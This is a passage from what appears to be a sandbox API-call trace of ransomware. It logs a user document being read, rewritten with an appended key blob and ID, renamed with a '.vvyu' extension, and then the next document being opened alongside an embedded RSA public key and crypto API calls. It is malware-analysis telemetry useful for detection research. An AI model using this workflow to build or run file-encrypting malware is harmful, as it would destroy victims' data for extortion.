hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd540) returned 0x2ea79b0 [0193.805] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0b10 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b20 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0b58 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b08 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b38 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643af0 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.806] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea1a68 [0193.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643af0 | out: hHeap=0x620000) returned 1 [0193.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643af0 [0193.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0193.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b38 [0193.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x6573d8 [0193.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0193.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0193.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0193.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0193.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643af0 | out: hHeap=0x620000) returned 1 [0193.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.810] GetCurrentThreadId () returned 0x66c [0193.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f650 [0193.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.810] GetCurrentThreadId () returned 0x66c [0193.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643af0 [0193.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b38 [0193.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6573d8 [0193.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0193.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657300 [0193.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0193.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0193.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657228 [0193.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657270 [0193.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657228 [0193.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b38 [0193.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea1a68 [0193.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643af0 | out: hHeap=0x620000) returned 1 [0193.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0193.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea1c78 [0193.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0193.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0193.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea1e90 [0193.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1c78 | out: hHeap=0x620000) returned 1 [0193.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1e90 | out: hHeap=0x620000) returned 1 [0193.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b08 | out: hHeap=0x620000) returned 1 [0193.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0b58 | out: hHeap=0x620000) returned 1 [0193.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.822] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xd533, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xd533, lpOverlapped=0x0) returned 1 [0193.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.823] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xd538, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.823] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea1a68 [0193.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea1a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea1e98 [0193.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.824] WriteFile (in: hFile=0x568, lpBuffer=0x2ea1e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea1e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1e98 | out: hHeap=0x620000) returned 1 [0193.825] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.825] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.825] CloseHandle (hObject=0x568) returned 1 [0193.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea1a68 [0193.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.827] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\J0ThFcHeulkvK.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\j0thfcheulkvk.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\J0ThFcHeulkvK.odp.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\j0thfcheulkvk.odp.vvyu")) returned 1 [0193.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.829] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.832] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0876f0, ftCreationTime.dwHighDateTime=0x1d85019, ftLastAccessTime.dwLowDateTime=0x2fe6a6a0, ftLastAccessTime.dwHighDateTime=0x1d88296, ftLastWriteTime.dwLowDateTime=0x2fe6a6a0, ftLastWriteTime.dwHighDateTime=0x1d88296, nFileSizeHigh=0x0, nFileSizeLow=0xd6cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jw5nfUjDO04Vpw2Wo.xlsx", cAlternateFileName="JW5NFU~1.XLS")) returned 1 [0193.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0b58 [0193.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0193.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0b58 | out: hHeap=0x620000) returned 1 [0193.832] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\jw5nfUjDO04Vpw2Wo.xlsx") returned=".xlsx" [0193.832] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\jw5nfUjDO04Vpw2Wo.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\jw5nfujdo04vpw2wo.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.833] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=54987) returned 1 [0193.833] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.836] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xd6a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.836] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.838] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.838] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xd6cb, lpOverlapped=0x0) returned 1 [0193.840] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.840] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.840] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.840] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.841] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.841] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, 